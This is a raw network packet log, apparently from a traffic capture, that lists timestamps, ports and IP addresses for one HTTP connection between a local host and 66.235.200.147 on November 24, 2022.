Nov 24, 2022 12:19:59.631242037 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.631241083 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.631272078 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.631283045 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.631283045 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.631303072 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.631387949 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.631526947 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.631562948 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.631591082 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.631597042 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.631632090 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.631661892 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.631685972 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.631691933 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.631720066 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.631721973 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.631752968 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.631793022 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.632534981 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.632581949 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.632622004 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.632653952 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.632666111 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.632673979 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.632704973 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.632749081 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.632752895 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.632791042 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.632843018 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.633354902 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.633389950 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.633418083 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.633447886 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.633476019 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.633505106 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.633503914 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.633523941 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.633533001 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.633563042 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.633582115 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.633601904 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.634280920 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.634315014 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.634344101 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.634371996 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.634377003 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.634401083 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.634426117 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.634430885 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.634460926 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.634490967 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.634501934 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.634530067 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.635236979 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.635272980 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.635301113 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.635335922 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.635344028 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.635375023 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.635405064 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.635422945 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.635433912 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.635445118 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.635464907 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.635612965 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.636183977 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.636265993 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.636296034 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.636324883 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.636333942 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.636354923 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.636368990 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.636384964 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.636415958 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.636444092 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.636464119 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.636471987 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.636482000 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.637197018 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.637228012 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.637255907 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.637268066 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.637284994 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.637304068 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.637315035 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.637342930 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.637371063 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.637381077 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.637402058 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.637413025 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.638164997 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.638206959 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.638235092 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.638263941 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.638286114 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.638292074 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.638320923 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.638333082 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.638350964 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.638351917 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.638380051 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.638412952 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.639050007 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.639142990 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.639169931 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.639197111 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.639221907 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.639223099 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.639249086 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.639250994 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.639267921 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.639276028 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.639302969 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.639317989 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.639329910 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.640105963 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.640139103 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.640168905 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.640197992 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.640223980 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.640249968 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.640249014 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.640276909 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.640285969 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.640304089 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.640309095 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.640352964 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.641098022 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.641124010 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.641149998 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.641174078 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.641180992 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.641201019 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.641227961 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.641232014 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.641256094 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.641273975 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.641282082 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.641697884 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.641932011 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.648646116 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.648725033 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.648766041 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.648801088 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.648823023 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.648833990 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.648866892 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.648870945 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.648886919 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.648905993 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.648937941 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.648957968 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.648976088 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.649008989 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.649034023 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.649039030 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.649072886 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.649296045 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.649324894 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.649352074 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.649379015 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.649399996 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.649404049 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.649424076 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.649431944 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.649457932 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.649482965 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.649504900 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.649535894 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.650280952 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.650317907 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.650352001 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.650384903 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.650386095 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.650418997 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.650435925 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.650466919 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.650500059 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.650535107 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.650547028 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.650584936 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.651191950 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.651228905 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.651264906 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.651299953 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.651340961 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.651369095 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.651369095 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.651402950 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.651437998 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.651473045 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.651483059 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.651645899 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.652113914 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.652152061 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.652185917 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.652221918 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.652236938 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.652256012 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.652273893 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.652292013 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.652327061 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.652364016 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.652394056 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.652427912 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.653069973 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.653106928 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.653141022 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.653176069 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.653212070 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.653218985 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.653245926 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.653270960 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.653280020 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.653304100 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.653315067 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.653373003 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.654139996 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.654177904 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.654211998 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.654247999 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.654258966 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.654283047 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.654289007 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.654318094 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.654352903 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.654367924 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.654386997 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.654505968 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.654841900 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.654894114 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.654931068 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.654966116 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.655000925 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.655005932 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.655035019 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.655050039 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.655070066 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.655077934 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.655105114 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.655138969 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.655188084 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.655751944 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.655791044 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.655829906 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.655864954 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.655865908 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.655888081 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.655900002 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.655935049 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.655968904 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.655982971 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.656002998 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.656016111 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.656039000 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.656562090 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.656600952 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.656640053 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.656641960 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.656682014 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.656682968 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.656718016 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.656738043 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.656754017 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.656788111 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.656822920 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.656836987 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.656874895 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.659101963 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.659141064 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.659171104 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.659204960 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.659240007 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.659245968 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.659275055 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.659292936 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.659311056 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.659322977 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.659347057 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.659382105 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.659415960 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.659437895 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.659450054 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.659473896 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.659485102 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.659518957 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.659552097 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.659570932 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.659589052 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.659610033 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.660011053 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.660042048 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.660069942 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.660099030 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.660104990 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.660128117 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.660144091 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.660157919 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.660172939 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.660192013 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.660221100 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.660235882 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.660252094 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.660274982 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.660294056 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.660306931 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.660340071 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.660389900 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.660927057 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.660959959 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.660989046 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.661019087 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.661036015 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.661047935 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.661067009 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.661077976 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.661101103 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.661115885 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.661144018 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.661175013 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.661195040 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.661204100 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.661231995 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.661236048 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.661266088 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.661314011 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.661809921 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.661844015 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.661873102 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.661902905 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.661911964 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.661931992 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.661936998 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.661963940 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.661978960 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.661994934 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.662024021 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.662050009 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.662051916 CET	80	49708	66.235.200.147	192.168.2.3
